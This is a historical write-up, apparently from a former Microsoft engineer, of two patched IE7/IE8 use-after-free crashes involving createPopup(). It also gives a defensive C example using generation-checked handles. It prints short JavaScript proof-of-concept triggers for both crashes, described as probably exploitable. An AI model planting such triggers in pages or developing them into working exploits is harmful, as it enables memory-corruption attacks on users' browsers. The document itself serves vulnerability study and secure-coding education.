This entry contained two distinct crashes involving createPopup() and page lifecycle events. Both exploited the fact that hiding or focusing a popup at exactly the wrong moment during navigation caused the browser to dereference freed memory.

Crash 01 — IE7 and IE8

var wPop = window.open("popup.html");   // child window whose load/unload events drive the sequence
var badPop = createPopup();             // IE-only window.createPopup() popup, owned by this document

wPop.onload = function() { badPop.hide(); };   // hide the popup while the child page is loading
wPop.onunload = function() { wPop.focus(); };  // focus the child while it is being torn down
badPop.show(0, 0, 10, 10);                     // show the popup to start the sequence

Crash 02 — IE8

var badPop = window[0].createPopup();     // popup created through a child frame's window object
badPop.document.body.innerHTML = "test";  // give the popup some content
badPop.show(0, 0, 100, 100);

setTimeout(function() { badPop.hide(); }, 1);   // hide the popup 1 ms after showing it
setTimeout("location.reload()", 200);           // reload the owning document 200 ms later

In both cases the popup object outlived the document context it was tied to. Calling hide() during an unload or after a reload tried to access an already-freed CDoc structure, producing access violations that were classified as PROBABLY_EXPLOITABLE.
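The root cause in both crashes is an ownership bug: a popup kept a raw reference to its owning document and kept using it after the document had been torn down. The following C program is an added example, not IE's code and not from the original entry, and every name in it (DocSlot, DocHandle, Popup, doc_resolve, popup_hide) is invented for illustration. It models the defensive pattern that prevents this class of bug: the popup stores a generation-checked handle instead of a pointer, so hide() after unload or reload (and even after the freed slot has been reused by a new document) is rejected with an error rather than dereferencing freed memory.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>

/* Added example (not IE's code): a toy document table addressed through
   generation-checked handles. A popup holds a handle, not a raw pointer, so
   using it after the document is gone fails safely. All names are invented. */

#define MAX_DOCS 4

typedef struct {
    char *html;      /* heap-owned content, freed on teardown */
    unsigned gen;    /* bumped whenever the slot is freed or reused */
    bool live;
} DocSlot;

typedef struct {
    unsigned index;
    unsigned gen;
} DocHandle;

typedef struct {
    DocHandle owner; /* the document this popup belongs to */
    bool shown;
} Popup;

static DocSlot g_docs[MAX_DOCS];

DocHandle doc_create(const char *html) {
    for (unsigned i = 0; i < MAX_DOCS; i++) {
        if (!g_docs[i].live) {
            g_docs[i].html = strdup(html);
            g_docs[i].live = true;
            g_docs[i].gen++;                 /* new generation for this slot */
            return (DocHandle){ i, g_docs[i].gen };
        }
    }
    return (DocHandle){ MAX_DOCS, 0 };       /* table full: invalid handle */
}

/* Resolve a handle; NULL if the document was freed or its slot was reused. */
DocSlot *doc_resolve(DocHandle h) {
    if (h.index >= MAX_DOCS) return NULL;
    DocSlot *s = &g_docs[h.index];
    if (!s->live || s->gen != h.gen) return NULL;
    return s;
}

/* Tear the document down, as unload or location.reload() would. */
void doc_destroy(DocHandle h) {
    DocSlot *s = doc_resolve(h);
    if (!s) return;
    free(s->html);
    s->html = NULL;
    s->live = false;
    s->gen++;        /* every outstanding handle is now stale */
}

Popup popup_create(DocHandle owner) {
    return (Popup){ owner, false };
}

/* Both return 0 on success and -1 when the owning document is gone. */
int popup_show(Popup *p) {
    if (!doc_resolve(p->owner)) return -1;
    p->shown = true;
    return 0;
}

int popup_hide(Popup *p) {
    if (!doc_resolve(p->owner)) return -1;   /* stale handle: refuse, do not crash */
    p->shown = false;
    return 0;
}

/* Normal lifecycle: show and hide while the document is alive. Returns 0. */
int happy_path(void) {
    DocHandle d = doc_create("ok");
    Popup p = popup_create(d);
    int r = popup_show(&p);
    if (r == 0) r = popup_hide(&p);
    doc_destroy(d);
    return r;
}

/* The crash ordering: show, tear the document down, then hide. Returns -1. */
int hide_after_teardown(void) {
    DocHandle d = doc_create("test");
    Popup p = popup_create(d);
    if (popup_show(&p) != 0) return -100;
    doc_destroy(d);
    return popup_hide(&p);
}

/* Slot reuse: a new document takes the freed slot, the old handle still fails. */
int hide_after_slot_reuse(void) {
    DocHandle old = doc_create("first");
    Popup p = popup_create(old);
    popup_show(&p);
    doc_destroy(old);
    DocHandle fresh = doc_create("second");  /* reuses the slot with a newer generation */
    int r = popup_hide(&p);                  /* old generation mismatches: -1 */
    doc_destroy(fresh);
    return r;
}

int main(void) {
    printf("happy path: %d\n", happy_path());
    printf("hide after teardown: %d\n", hide_after_teardown());
    printf("hide after slot reuse: %d\n", hide_after_slot_reuse());
    return 0;
}
```

The generation counter is what makes the check robust: a plain "is the slot live" flag would wrongly accept the old handle once a new document reused the slot, which is exactly the situation a reload creates. Reference counting (the popup holding a strong reference that keeps the CDoc alive until hide() completes) is the other common fix for this pattern.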

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.